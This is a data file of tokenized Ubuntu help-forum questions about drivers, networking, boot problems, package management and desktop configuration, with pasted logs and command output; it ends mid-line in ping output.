510736	why are drives initially unmounted ?	in linux operating systems , drives remain unmounted until you open/mount them . as a result , any file residing in an unmounted drive can not be accessed , like say , from your firefox history or when you open a saved document from somewhere . my intuition tells me that there must be some benefit of this feature . what is it ?
510738	have a given program handle a bluetooth device events	( ubuntu 14.04 gnome-classic ) a given bluetooth device ( a mouse ) having address like `` [ 01:25:33:95 : e5:4a ] '' is connected and works fine . i would like , however , to configure something somewhere in order to have a program written by myself handle the mouse events , instead of x . for starters xinput -- disable deviceid will make the mouse not being handled by x anymore - while its handler bluetoothd still manages the device at a low level ( ie the device is still alive and communicates with the computer , but x disregards its events ) . is there a way to have all the bt events sent to my program ( whatever the form , socket , ... ) now that x itself disabled the device handling ? ( notes : this is a configuration question , not a programming question had a look at udev , but it is triggered when the device is plugged in/out maybe bluetoothd is the key to do what i want , but its configuration seems not well documented )
510741	failed to suspend due to nouveau failure	there are many questions about failed suspension on ubuntu ( [ 1 ] [ 2 ] ) , but each of them seem so specific that i 'm posting mine . in my case , sometimes ( very randomly ) my xp15 does not suspend . i 'm running ubuntu 14.04 updated to current date . my syslog states : aug 12 23:20:24 ged kernel : [ 32564.982253 ] suspending console ( s ) ( use no_console_suspend to debug ) aug 12 23:20:24 ged kernel : [ 32564.982580 ] sd 1:0:0:0 : [ sdb ] synchronizing scsi cache aug 12 23:20:24 ged kernel : [ 32564.982615 ] sd 0:0:0:0 : [ sda ] synchronizing scsi cache aug 12 23:20:24 ged kernel : [ 32564.984880 ] sd 0:0:0:0 : [ sda ] stopping disk aug 12 23:20:24 ged kernel : [ 32564.985451 ] sd 1:0:0:0 : [ sdb ] stopping disk aug 12 23:20:24 ged kernel : [ 32565.032197 ] nouveau [ drm ] suspending display ... aug 12 23:20:24 ged kernel : [ 32565.032205 ] nouveau [ drm ] unpinning framebuffer ( s ) ... aug 12 23:20:24 ged kernel : [ 32565.032208 ] nouveau [ drm ] evicting buffers ... aug 12 23:20:24 ged kernel : [ 32565.032210 ] nouveau [ drm ] waiting for kernel channels to go idle ... aug 12 23:20:24 ged kernel : [ 32565.032250 ] nouveau [ drm ] suspending client object trees ... aug 12 23:20:24 ged kernel : [ 32565.033027 ] nouveau [ drm ] suspending kernel object tree ... aug 12 23:20:24 ged kernel : [ 32567.035761 ] nouveau e [ pdisp ] [ 0000:01:00.0 ] [ 0xc000857c ] [ ffff88042386bb80 ] fini timeout , 0xc2061008 aug 12 23:20:24 ged kernel : [ 32567.035764 ] nouveau e [ pdisp ] [ 0000:01:00.0 ] [ 0xc000857c ] [ ffff88042386bb80 ] failed suspend , -16 aug 12 23:20:24 ged kernel : [ 32567.035766 ] nouveau e [ drm ] 0xd1500000:0xd15c7c00 suspend failed with -16 aug 12 23:20:24 ged kernel : [ 32567.035804 ] nouveau e [ drm ] 0xdddddddd:0xd1500000 suspend failed with -16 aug 12 23:20:24 ged kernel : [ 32567.035922 ] nouveau e [ drm ] 0xffffffff:0xdddddddd suspend failed with -16 aug 12 23:20:24 ged kernel : [ 32567.036633 ] nouveau e [ drm ] 0xffffffff:0xffffffff suspend failed with -16 aug 12 23:20:24 ged kernel : [ 32567.036757 ] nouveau [ drm ] resuming display ... aug 12 23:20:24 ged kernel : [ 32567.036785 ] nouveau e [ drm ] bo ffff880036980000 pinned elsewhere : 0x00000002 vs 0x00000004 aug 12 23:20:24 ged kernel : [ 32567.036788 ] [ drm : drm_helper_resume_force_mode ] *error* failed to set mode on crtc ffff88041f020000 aug 12 23:20:24 ged kernel : [ 32567.044935 ] pci_pm_suspend ( ) : nouveau_pmops_suspend+0x0/0xb0 [ nouveau ] returns -16 aug 12 23:20:24 ged kernel : [ 32567.044939 ] dpm_run_callback ( ) : pci_pm_suspend+0x0/0x150 returns -16 aug 12 23:20:24 ged kernel : [ 32567.044945 ] pm : device 0000:01:00.0 failed to suspend async : error -16 aug 12 23:20:24 ged kernel : [ 32567.045007 ] pm : some devices failed to suspend , or early wake event detected as it seems the problem is on the video card . the result from lspci | grep vga returns . 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev a1 ) which is strange , is that i 'm not using the nvidia card ( since both nouveau and official drivers are not stable in my machine ) . any hints for a next step ?
510742	keyboard shortcut increase/decrease font size when using guake ?	is there a keyboard shortcut to increase or decrease the font size while using guake ? i have it in guake preferences through a few clicks but if i am doing a presentation and the audience as a tough time seeing then i want to be able to do something similar to what a browser does with ctrl + +/- or ctrl + wheel scroll .
510749	apt-get not working even after updating apt.conf	i have configured my apt.conf file correctly . still sudo apt-get update is giving me this error : 407 proxy authentication required in /etc/apt/apt.conf , i have this : acquire : :http : :proxy `` http : //username : password @ host.domain.com:8080/ '' ; i have already tried : export http_proxy= '' http : //username : password @ host.domain.com:8080/ ;
510751	operate genius colorpage-vivied 1200xe on ubuntu14.04 lts	i can not install the scanner genius colorpage-vivied 1200xe on ubuntu 14.04lts , the scanner utilities can not recognize the device
510752	bash utility 'dialog ' leaves a messy screen	when i run this script it displays options in a menu style on my terminal and then runs the relavent command in the script . # ! /bin/sh temp=/tmp/answer $ $ dialog -- ascii-lines -- title `` administrative tasks '' -- menu `` tasks : '' 20 0 0 1 `` display firewall settings '' 2 `` restore firewall settings '' 3 `` flush firewall settings '' 2 > $ temp choice=`cat $ temp` case $ choice in 1 ) iptables -l ; ; 2 ) iptables-restore < /etc/iptables.firewall.rules iptables -l ; ; 3 ) iptables -- flush iptables -l ; ; esac echo selected $ choice but when it exits the screen is messed up . is there a way to `` save '' the state of screen before i ran this and restore it ? is there a better `` windows '' scripting program that runs in a text screen ?
510760	need help creating shortcuts on the desktop in ubuntu	just wondering how do i add desktop shortcuts in ubuntu . i know i can not right click and add ( like windows or linux mint ) . thanks in advance
510761	ubuntu goes down daily at night - vm	we have a ubuntu vm on hyper-v and on it we have a lamp server installed and an internal domain accessible from the intranet . everyday we have to restart it because the connectivity to the server goes down . when we log to the vm , the network is down , no internet at all i saw the logs and something happen at 2am here is more info : linux hpjs-desktop 2.6.32-38-generic # 83-ubuntu smp wed jan 4 11:13:04 utc 2012 i686 gnu/linux cat /etc/network/interfaces auto lo iface lo inet loopback auto seth0 iface seth0 inet dhcp cat /etc/dhcp3/dhclient.conf option rfc3442-classless-static-routes code 121 = array of unsigned integer 8 ; send host-name `` '' ; request subnet-mask , broadcast-address , time-offset , routers , domain-name , domain-name-servers , domain-search , host-name , netbios-name-servers , netbios-scope , interface-mtu , rfc3442-classless-static-routes , ntp-servers ; ifconfig eth2 link encap : ethernet hwaddr 00:15:5d:01:05:16 inet addr:192.168.1.103 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :215:5dff : fe01:516/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:245080 errors:0 dropped:0 overruns:0 frame:0 tx packets:26105 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:30436098 ( 30.4 mb ) tx bytes:7172154 ( 7.1 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:114 errors:0 dropped:0 overruns:0 frame:0 tx packets:114 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8886 ( 8.8 kb ) tx bytes:8886 ( 8.8 kb ) and some logs : vim /var/log/kern.log aug 13 02:14:16 hpjs-desktop kernel : [ 4.438320 ] ext4-fs ( sda1 ) : info : recovery required on readonly filesystem aug 13 02:14:16 hpjs-desktop kernel : [ 4.438327 ] ext4-fs ( sda1 ) : write access will be enabled during recovery aug 13 02:14:16 hpjs-desktop kernel : [ 12.096040 ] ext4-fs ( sda1 ) : orphan cleanup on readonly fs aug 13 02:14:16 hpjs-desktop kernel : [ 12.096040 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7340040 aug 13 02:14:16 hpjs-desktop kernel : [ 12.096040 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7340039 aug 13 02:14:16 hpjs-desktop kernel : [ 12.096040 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7340038 aug 13 02:14:16 hpjs-desktop kernel : [ 12.096040 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7340037 aug 13 02:14:16 hpjs-desktop kernel : [ 12.096040 ] ext4-fs ( sda1 ) : ext4_orphan_cleanup : deleting unreferenced inode 7340036 aug 13 02:14:16 hpjs-desktop kernel : [ 12.096040 ] ext4-fs ( sda1 ) : 5 orphan inodes deleted aug 13 02:14:16 hpjs-desktop kernel : [ 12.096040 ] ext4-fs ( sda1 ) : recovery complete aug 13 02:14:16 hpjs-desktop kernel : [ 12.190173 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode aug 13 02:14:16 hpjs-desktop kernel : [ 36.468053 ] adding 5448696k swap on /dev/hda5 . priority : -1 extents:1 across:5448696k aug 13 02:14:16 hpjs-desktop kernel : [ 36.577612 ] udev : starting version 151 aug 13 02:14:16 hpjs-desktop kernel : [ 36.869644 ] piix4_smbus 0000:00:07.3 : smbus base address uninitialized - upgrade bios or use force_addr=0xaddr aug 13 02:14:16 hpjs-desktop kernel : [ 37.029617 ] vmbus_drv : generating uevent - vmbus_device_class_guid= { c5295816-f63a-4d5f-8d1a4daf999ca185 } aug 13 02:14:16 hpjs-desktop kernel : [ 37.029645 ] vmbus_drv : generating uevent - vmbus_device_class_guid= { 32412632-86cb-44a2-9b5c50d1417354f5 } aug 13 02:14:16 hpjs-desktop kernel : [ 37.029751 ] vmbus_drv : generating uevent - vmbus_device_class_guid= { cfa8b69e-5b4a-4cc0-b98b8ba1a1f3f95a } aug 13 02:14:16 hpjs-desktop kernel : [ 37.029778 ] vmbus_drv : generating uevent - vmbus_device_class_guid= { ba6163d9-04a1-4d29-b60572e2ffb1dc7f } aug 13 02:14:16 hpjs-desktop kernel : [ 37.029843 ] vmbus_drv : generating uevent - vmbus_device_class_guid= { f8615163-df3e-46c5-913ff2d2f965ed0e } aug 13 02:14:16 hpjs-desktop kernel : [ 37.323305 ] lp : driver loaded but no devices found aug 13 02:14:16 hpjs-desktop kernel : [ 37.325365 ] vga16fb : initializing aug 13 02:14:16 hpjs-desktop kernel : [ 37.325370 ] vga16fb : mapped to 0xc00a0000 aug 13 02:14:16 hpjs-desktop kernel : [ 37.325433 ] fb0 : vga16 vga frame buffer device aug 13 02:14:16 hpjs-desktop kernel : [ 37.508816 ] udev : renamed network interface eth0 to eth2 aug 13 02:14:16 hpjs-desktop kernel : [ 39.431272 ] psmouse serio1 : id : 12 00 64 aug 13 02:14:16 hpjs-desktop kernel : [ 39.975057 ] trackpoint.c : failed to get extended button data aug 13 02:14:16 hpjs-desktop kernel : [ 40.876129 ] console : switching to colour frame buffer device 80x30 aug 13 02:14:16 hpjs-desktop kernel : [ 41.271321 ] type=1505 audit ( 1407910454.512:2 ) : operation= '' profile_load '' pid=533 name= '' /sbin/dhclient3 '' aug 13 02:14:16 hpjs-desktop kernel : [ 41.273609 ] type=1505 audit ( 1407910454.516:3 ) : operation= '' profile_replace '' pid=516 name= '' /sbin/dhclient3 '' aug 13 02:14:16 hpjs-desktop kernel : [ 41.274548 ] type=1505 audit ( 1407910454.516:4 ) : operation= '' profile_load '' pid=516 name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' aug 13 02:14:16 hpjs-desktop kernel : [ 41.275072 ] type=1505 audit ( 1407910454.516:5 ) : operation= '' profile_load '' pid=516 name= '' /usr/lib/connman/scripts/dhclient-script '' aug 13 02:14:16 hpjs-desktop kernel : [ 42.203697 ] type=1505 audit ( 1407910455.447:6 ) : operation= '' profile_replace '' pid=533 name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' aug 13 02:14:16 hpjs-desktop kernel : [ 42.204264 ] type=1505 audit ( 1407910455.448:7 ) : operation= '' profile_replace '' pid=533 name= '' /usr/lib/connman/scripts/dhclient-script '' aug 13 02:14:16 hpjs-desktop kernel : [ 43.175228 ] type=1505 audit ( 1407910456.416:8 ) : operation= '' profile_load '' pid=627 name= '' /usr/share/gdm/guest-session/xsession '' aug 13 02:14:16 hpjs-desktop kernel : [ 43.194934 ] type=1505 audit ( 1407910456.436:9 ) : operation= '' profile_replace '' pid=629 name= '' /sbin/dhclient3 '' aug 13 02:14:16 hpjs-desktop kernel : [ 43.195875 ] type=1505 audit ( 1407910456.436:10 ) : operation= '' profile_replace '' pid=629 name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' aug 13 02:14:16 hpjs-desktop kernel : [ 43.242447 ] type=1505 audit ( 1407910456.484:11 ) : operation= '' profile_replace '' pid=629 name= '' /usr/lib/connman/scripts/dhclient-script '' aug 13 02:14:18 hpjs-desktop kernel : [ 45.288537 ] ibm trackpoint firmware : 0x01 , buttons : 0/0 aug 13 02:14:18 hpjs-desktop kernel : [ 45.289856 ] input : tpps/2 ibm trackpoint as /devices/platform/i8042/serio1/input/input3 aug 13 02:14:19 hpjs-desktop kernel : [ 46.344868 ] ppdev : user-space parallel port driver update :
510763	unable to restart the system after installation of nvidia driver331.89	installation of nvidia drivers is very important to me as i want to do molecular dynamics . i have been struggled for three months . i have have tried these command to uninstall and re-installation : sudo apt-get purge nvidia* sudo apt-get install nvidia-331-updates-dev after that command i tried to restart the system but was unable to restart . i did n't get any message or error . could you please tell me , what could be the reason and how to over come it ?
510764	removing unity and install mate 1.8	i want to install mate as the only de on my machine and i want to remove totally unity and lightdm without causing conflicts . how to do that ? i have an acer aspire e-522 with a dual boot with w7 and ubuntu 14.04lts .
510765	how to remove default installed windows 8.1 and replace with ubuntu ?	i 've just bought a new computer with default installed windows 8.1 and i absolutely hate it . i 've been using ubuntu before , but it was totally different for me , because i installed it on an empty hard drive . so , my question is , what do i have to do ( step by step ) to completely get rid of windows and install the newest version of ubuntu ? thank you very much !
510772	error occured , go into package manager to see the issue	failed to load the package list this is a serious problem . try again later . if this problem appears again , please report an error to the developers . e : unable to parse package file /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_trusty-updates_universe_i18n_translation-en ( 1 ) e : problem opening /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_trusty-backports_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . this is being showed with the red sign on the top-left of the screen .
510780	grub loads recovery and not ubuntu	i 've been wondering why my computer is loading grub recovery and not ubuntu , i believe this could be because the laptop battery died while the package manager was running and the package manager was setting up the kernel . plus , can i copy the kernel from the live cd to the hard drive , and how can i do it ?
510781	i ca n't open eclipse	i ca n't open my eclipse . when i am opening it from terminal , it shows me the following error : ( java:3312 ) : glib-gobject-warning ** : can not register existing type `gdkdisplaymanager' ( java:3312 ) : glib-critical ** : g_once_init_leave : assertion `initialization_value ! = 0 ' failed ( java:3312 ) : glib-gobject-critical ** : g_object_new : assertion `g_type_is_object ( object_type ) ' failed ( java:3312 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( java:3312 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed ( java:3312 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( java:3312 ) : glib-gobject-critical ** : g_signal_connect_data : assertion `g_type_check_instance ( instance ) ' failed ( java:3312 ) : glib-gobject-warning ** : can not register existing type `gdkdisplay' ( java:3312 ) : glib-critical ** : g_once_init_leave : assertion `initialization_value ! = 0 ' failed ( java:3312 ) : glib-gobject-critical ** : g_type_register_static : assertion `parent_type > 0 ' failed ( java:3312 ) : glib-critical ** : g_once_init_leave : assertion `initialization_value ! = 0 ' failed ( java:3312 ) : glib-gobject-critical ** : g_object_new : assertion `g_type_is_object ( object_type ) ' failed # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007f10648bfd41 , pid=3312 , tid=139708783437568 # # jre version : 7.0_21-b02 # java vm : openjdk 64-bit server vm ( 23.7-b01 mixed mode linux-amd64 compressed oops ) # problematic frame : # c [ libgdk-x11-2.0.so.0+0x4fd41 ] gdk_display_open+0x41 # # failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again # # an error report file with more information is saved as : # /home/jay/hs_err_pid3312.log # # if you would like to submit a bug report , please include # instructions on how to reproduce the bug and visit : # https : //bugs.launchpad.net/ubuntu/+source/openjdk-7/ # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . # what is the solution ?
510783	how could i search for missing driver	i just installed lubuntu on my laptop but there is no driver for the wifi connection or sound i searched but i still did n't find the way to install them so help me i still a student and i 'd like to lean programming
510784	ubuntu zpanel unable to receive e-mail	i am able to send e-mail from my zpanel mailboxes but am unable to receive any e-mails . i get this error from gmail when i try to send e-mail to my mailboxes : mail exchanger not found . my domain name registar settings have a record set to my vps ip and mail.mydomain.com set as mx server ( where `` mydomain '' is my actual domain ) . in zpanel i added this domain and configured dns . the domain is working normally ( connects to vps ) . in zpanel dns settings i have added mail a record pointing to vps ip . also , in zpanel dns mx target settings i have added `` mail.mydomain.com '' ( where `` mydomain '' is my actual domain ) . zpanel installs postfix and everything automatically so according to them it should all work normally after domain was added and mailbox has been created .
510786	how to get the terminal text those are overflowed during command execution ?	some commands have very large output texts in terminal . sometimes some lines of texts goes out of the terminal during command execution . how to get that texts ? update : i mean the terminal that comes with ubuntu ( 12.04 ) .
510788	dropbox behind a proxy under ubuntu 14.04 server	is it possible to install dropbox under an ubuntu 14.04 server that is behind a proxy with credentials ?
510791	kubuntu 14.04 crashes on boot on asus pc	after successfully installing kubuntu 13.10 ( 64bit ) on my asus pc , i tried to upgrade to 14.04 . after the upgrade completed and i tried to restart , the boot process crashes with a kernel panic , see screenshot below : the same problem occurs when i try and boot directly from a usb stick from the .iso image . version 13.10 however works just fine ( i have to reinstall this old version now )
510797	no desktop display	i upgraded 12.04 lubuntu to 14:04 . there was no desktop so i downloaded nautilus . the display now shows gtk-warning can not open display what do i need to do to get my desktop working ?
510803	ubuntu 14.04 unity fails to load	i have been trying to get unity working after 14.04 upgrade yesterday hosed my system . i followed all suggested fixes including removing and reinstalling fglx . now i have nothing but tty1 screen on boot after gnome-desktop failed to load . this is a complete mess . i had lxde running fine before and now the suggested fixes are making the problem worse . can anyone help so i can get back to work ?
510804	eth0 and wlan0 not working aftre update to 14.04	i 've going around lot of forums during the las few days but for the moment no solutions . after updating to 14:04 no network activity dmesg output : addrconf ( netdev_up ) : wlan0 : link is not ready addrconf ( netdev_up ) : eth0 : link is not ready nmcli nm output : executing status hardware-wifi wifi wwan executing unplugged activated activated desactivated lspci -v ouput : 01:080:0 netowrk controller : ralink copr . rt2600 802.11 mimo subsystem : acction technology coporation device ee05 flags : bus master , slow devsel , latency , irq 18 capabilities : < acces denied > kernel driver in use : rt61pci kernel modules : rt61 pci no idea about the possible solutions ... .i 've tried several from other posts but ... .not working . the network manager does n't allow to add new connections . thanks in advance
510805	login screen freezed after resume	today i came into strange problem . yesterday , as always , i suspended my ubuntu 14.04 ( unity ) laptop for night . today as i open it up it shows login screen ( lightdm ) but it is impossible to write password in . i see password field but it is not editable ( the coursor does not blink ; i do not see dots as i type ) . i am able to move the mouse coursor . also , i am able to login into terminal by ctrl+alt+f1 . as i run the `` top '' command i see that my ( not root ) process `` init '' uses 100 % cpu . it would not be such a big issue since i can restart lightdm . however , the main problem is i have opened several chrome incognito windows with important tabs in it . i would like to somehow get access to these windows and save open tabs . is it possible ? i see two solutions : somehow unfreeze login screen to normally login . forget about login and somehow save chrome incognito sessions from the terminal . unfortunately i do not know how to do this . i would be very gratefull for any help .
510806	custom keyboard shortcuts lost after 12.04 to 14.04 upgrade	i used to have a lot of custom shortcuts on my user session , settings > keyboard > shortcuts > custom shortcuts . i network upgraded today from lts 12.04 to lts 14.04.1 . i logged in to my user , and alas ! no more custom shortcut keys ( the rest of my modifications , except only for the custom shortcuts , are there ) . the list became empty . can somebody please tell me how i could restore all those custom shortcuts ? : - )
510807	chromebook ubuntu 14.04 lts with unity dual boot	i currently use ubuntu 14.04 lts with unity as my primary desktop os . and recently , i have acquired an hp chromebook 11 ( arm ) , and i which to install ubuntu 14.04 lts on it because of a few software which i will need on the go ( skype for instance ) . i would really prefer having dual boot and choose between chrome os and ubuntu upon boot . i have seen many posts stating i can not have dual boot on arm machines and that i will be forced to use crouton and switch between both . is this still true ? i have also seen a lot of posts stating i can not have unity and i 'll have to use ubuntu with xfce . is this still true ? if so , what is the explanation to this ? thanks for any advice or experience on this .
510809	strange titles ( and bookmarks ) in chromium in xubuntu	chromium browser in xubuntu does n't show persian titles . for example this site : www.farsnews.com screenshot ( just title ) : how can i fix that ? i noticed it happens in bookmarks too . screenshot :
510810	multiple interface devices for kvm bridging	i have a server that i 'm trying to virtualize with kvm . i 'm trying to use a network bridge so that my kvm guests can have external ips . every time i create a bridge brctl addbr br0 brctl addif br0 eth0 it causes eth0 to drop out , which i now know is expected behavior . my first thought to work around this was to give only one ip to eth0 , which would be used to control the host server remotely , and put the rest of the ips in eth1 , so a network bridge could enslave eth1 without damaging remote connectivity is this a viable solution , or is there a better way to go about this ? whenever i try to add eth1 to /etc/network/interfaces , and then bring the networks down & up , it causes the server to no longer be accessible . i do have kvm access ( the remote access tool ) to the server , so i can fix it if things go wrong
510811	what is the difference between ctrl-z and ctrl-c in the shell ?	can anyone tell me the difference between ctrl+z and ctrl+c ? when i am in terminal , both the combinations stop the current process but what exactly is the difference between both ?
510813	12.10 ati x1950xt no boot cd no consol no access and system is running in low-graphics mode	i guess my case is desesperate and i do n't know where to start so if there is some expert this is the big problem . 1- when pc start i got the system is running in low graphics mode . 2- then any options selected after work ( run in low graph mode , reconfigure graphics , troubleshoot the error , exit to console login ) 3- the only action `` working '' is exit to console login and in this case black screen , impossible to write anything . 4- i can press power button and then reboot of the computer . boot cd of 12.10 not taking into account when reloading ... i really do n't know where to start and how to proceed
510814	starting tomcat manually vs using service start	are there any drawbacks to running tomcat using catalina.sh start rather than using service tomcat7 start ? to preface : i 'm trying to get jrebel started and was using setenv.sh to initialize jrebel for tomcat . after lots of laboring with trying to get my war recognized by jrebel ( remote deploy ) using this method but to no avail , i switched to their startup script which does basically the same thing i did previously but runs catalina.sh instead of starting the service . from what i can tell , this runs tomcat independently ( not accessible by service calls ) . are there any drawbacks from using tomcat in this way , or is using tomcat as a service a better practice and i should continue to find out why jrebel wont work correctly when initilized by setenv.sh ?
510819	how can i tease sonicwall ?	in my college , i ca n't use the web , because they use sonicwall network firewalls how can i tease it ? for i use all websites in my college ? please see the result when i access a website blocked i already tried use non-proxy but it did n't worked . thanks !
510822	installing dual-boot windows 8.1 / ubuntu uefi mode	i 've explored the internet looking for a simple way to match my needs , but could n't actually find something that fitted . i have a portable computer , a asus n750jv with uefi and i recall using gpt . i have a 16g ssd inside my hdd for the system loading . now what i want to do is to install ubuntu on this computer , keeping windows and choosing between the two with the windows boot manager ( kind of the sexy blue grub with icons ) while keeping the fast & secure boot activated . i tried this inconclusive method and deducted it was because the computers are differents . does anyone with the same model have made it through ?
510826	burg install error	im trying to install burg bootloader . os is ubuntu 14.04lts and windows ( unable to access through grub since the ubuntu update ) when i run the grub customizer i get the following error : burg-mkconfig could n't be executed successfully . error message : generating burg.cfg ... /usr/sbin/burg-probe : error : can not stat /boot/burg/locale ' . no path or device is specified . try/usr/sbin/burg-probe -- help ' for more information . any help , much appreciated .
510832	need graphics drivers foe aopen mk77m-8xn pc	can anyone suggest or recomend a suitable graphics drive ? i can only find these for windows os . lspci gives vga info : via technologies km400/kn400/p4m800 s3 unichrome ( rev 01 ) when running `` try ubuntu without installing '' from a unetbootin usb stick or booting from a clean ubuntu hard disk install the screen `` the system is running in low graphics mode '' is displayed , from which there is no recovery . pressing enter ( ok ) displays a further 4 options but none can be selected with either mouse or keyboard . during an install ( twice now ) all graphics display perfectly .
510839	install package from ubuntu dvd	i want to install some package from ubunu 14.04 lts dvd . below is what i did . could anyone please point out what was missing ? root @ ubunto : ~ # mount ~/ubuntu-14.04-desktop-amd64.iso /tmpmt -o loop root @ ubunto : ~ # ls /tmpmt autorun.inf casper efi isolinux pics preseed ubuntu boot dists install md5sum.txt pool readme.diskdefines wubi.exe root @ ubunto : ~ # add-apt-repository `` deb file : /tmpmt/ trusty dists '' root @ ubunto : ~ # apt-get update ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) trusty inrelease ign file : trusty inrelease get:1 file : trusty release.gpg [ 198 b ] ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) trusty/main translation-en_us ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) trusty/main translation-en ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) trusty/restricted translation-en_us ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - release amd64 ( 20140417 ) trusty/restricted translation-en get:2 file : trusty release [ 3,334 b ] 65 % [ connecting to us.archive.ubuntu.com ( 91.189.91.13 ) ] [ connecting to security.ubuntu.com ( 91.189.91.14 ) ] ^c root @ ubunto : ~ # apt-get install apt-file reading package lists ... done building dependency tree reading state information ... done package apt-file is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'apt-file ' has no installation candidate thanks in advance , alex
510840	dislplay a text in the virtual console login	i want to display a text `` thank you for logging in `` when the user will exit from the virtual console login what should i do ?
510841	how to setup usb wireless card as ap hotspot ( tl-wn725n )	i tried to set up hotspot for my android mobile on my ubuntu 12.04. follow the instruction of here : 'http : //thenewbieblog.wordpress.com/2012/05/01/wifi-hotspot-setup-on-ubuntu/ ' however it does not work for the old onboard card could not support the ap mode . i bought a tl usb wireless card for it , and installed the driver , then black list my onboard card in blacklist as 'blacklist iwlwifi ' . but when i called ap-hotspot configure , the same error appeared as : your wireless card does not support access point mode what should i do next ? here is the out put of iwconfig wlan1 unassociated nickname : '' < wifi @ realtek > '' mode : managed frequency=2.412 ghz access point : not-associated sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality=0/100 signal level=0 dbm noise level=0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . lo no wireless extensions . i think the wireless card works well but there are something wrong with the configure files ...
510845	ubuntu `` wubildr.mbr is missing or contains errors . ''	i want to get ubuntu on my laptop ( hp pavilion ) but every time i try to install it using wubi , i get this error : wubildr is missing or contains errors . what could be the problem ? i had ubuntu on this laptop before so it ca n't be anything with uefi . i also even tried a full installation . it would either come up with the same error or this : please insert a bootable medium . press any key to reboot .
510846	ca n't access my ip-cam	the ip of my router is 192.0.0.1 and it 's dhcp-range from 192.0.0.101 to 192.0.0.199 . the camera gets fround an arp-scan , when i reconnect it , but disappears soon after and i receive a `` network unormal '' error when i sometimes reach the camera menu under 192.0.0.64 . once i even catched the liveview for about a second . most of the time i do n't receive anything under the hikvision camera ( model 2cd2032-i ) ip 192.0.0.64 though . the router seems to be the problem . here is what a ping yields ( mind how it switches to .102 ) : nuc @ nuc : ~ $ sudo arp-scan -- localnet [ sudo ] password for nuc : interface : eth0 , datalink type : en10mb ( ethernet ) starting arp-scan 1.8.1 with 256 hosts ( http : //www.nta-monitor.com/tools/arp-scan/ ) 192.0.0.1 00:22:10:82:61:40 motorola mobility , inc. 192.0.0.64 44:19 : b6:2d:13 : a8 ( unknown ) 192.0.0.101 00:80:3f:3a : d6:79 tatung company 3 packets received by filter , 0 packets dropped by kernel ending arp-scan 1.8.1 : 256 hosts scanned in 1.519 seconds ( 168.53 hosts/sec ) . 3 responded nuc @ nuc : ~ $ ping 192.0.0.64 ping 192.0.0.64 ( 192.0.0.64 ) 56 ( 84 ) bytes of data . from 192.0.0.102 icmp_seq=10 destination host unreachable from 192.0.0.102 icmp_seq=11 destination host unreachable from 192.0.0.102 icmp_seq=12 destination host unreachable from 192.0.0.102 icmp_seq=13 destination host unreachable from 192.0.0.102 icmp_seq=14 destination host unreachable from 192.0.0.102 icmp_seq=15 destination host unreachable from 192.0.0.102 icmp_seq=16 destination host unreachable from 192.0.0.102 icmp_seq=17 destination host unreachable from 192.0.0.102 icmp_seq=18 destination host unreachable from 192.0.0.102 icmp_seq=19 destination host unreachable from 192.0.0.102 icmp_seq=20 destination host unreachable from 192.0.0.102 icmp_seq=21 destination host unreachable from 192.0.0.102 icmp_seq=22 destination host unreachable from 192.0.0.102 icmp_seq=23 destination host unreachable from 192.0.0.102 icmp_seq=24 destination host unreachable from 192.0.0.102 icmp_seq=25 destination host unreachable from 192.0.0.102 icmp_seq=26 destination host unreachable from 192.0.0.102 icmp_seq=27 destination host unreachable from 192.0.0.102 icmp_seq=28 destination host unreachable from 192.0.0.102 icmp_seq=29 destination host unreachable from 192.0.0.102 icmp_seq=30 destination host unreachable 64 bytes from 192.0.0.102 : icmp_seq=31 ttl=64 time=2383 ms 64 bytes from 192.0.0.102 : icmp_seq=32 ttl=64 time=1374 ms 64 bytes from 192.0.0.102 : icmp_seq=33 ttl=64 time=367 ms 64 bytes from 192.0.0.102 : icmp_seq=34 ttl=64 time=0.890 ms 64 bytes from 192.0.0.102 : icmp_seq=35 ttl=64 time=0.808 ms 64 bytes from 192.0.0.102 : icmp_seq=36 ttl=64 time=0.837 ms 64 bytes from 192.0.0.102 : icmp_seq=37 ttl=64 time=0.812 ms 64 bytes from 192.0.0.102 : icmp_seq=38 ttl=64 time=0.808 ms 64 bytes from 192.0.0.102 : icmp_seq=39 ttl=64 time=1.05 ms 64 bytes from 192.0.0.102 : icmp_seq=40 ttl=64 time=0.888 ms 64 bytes from 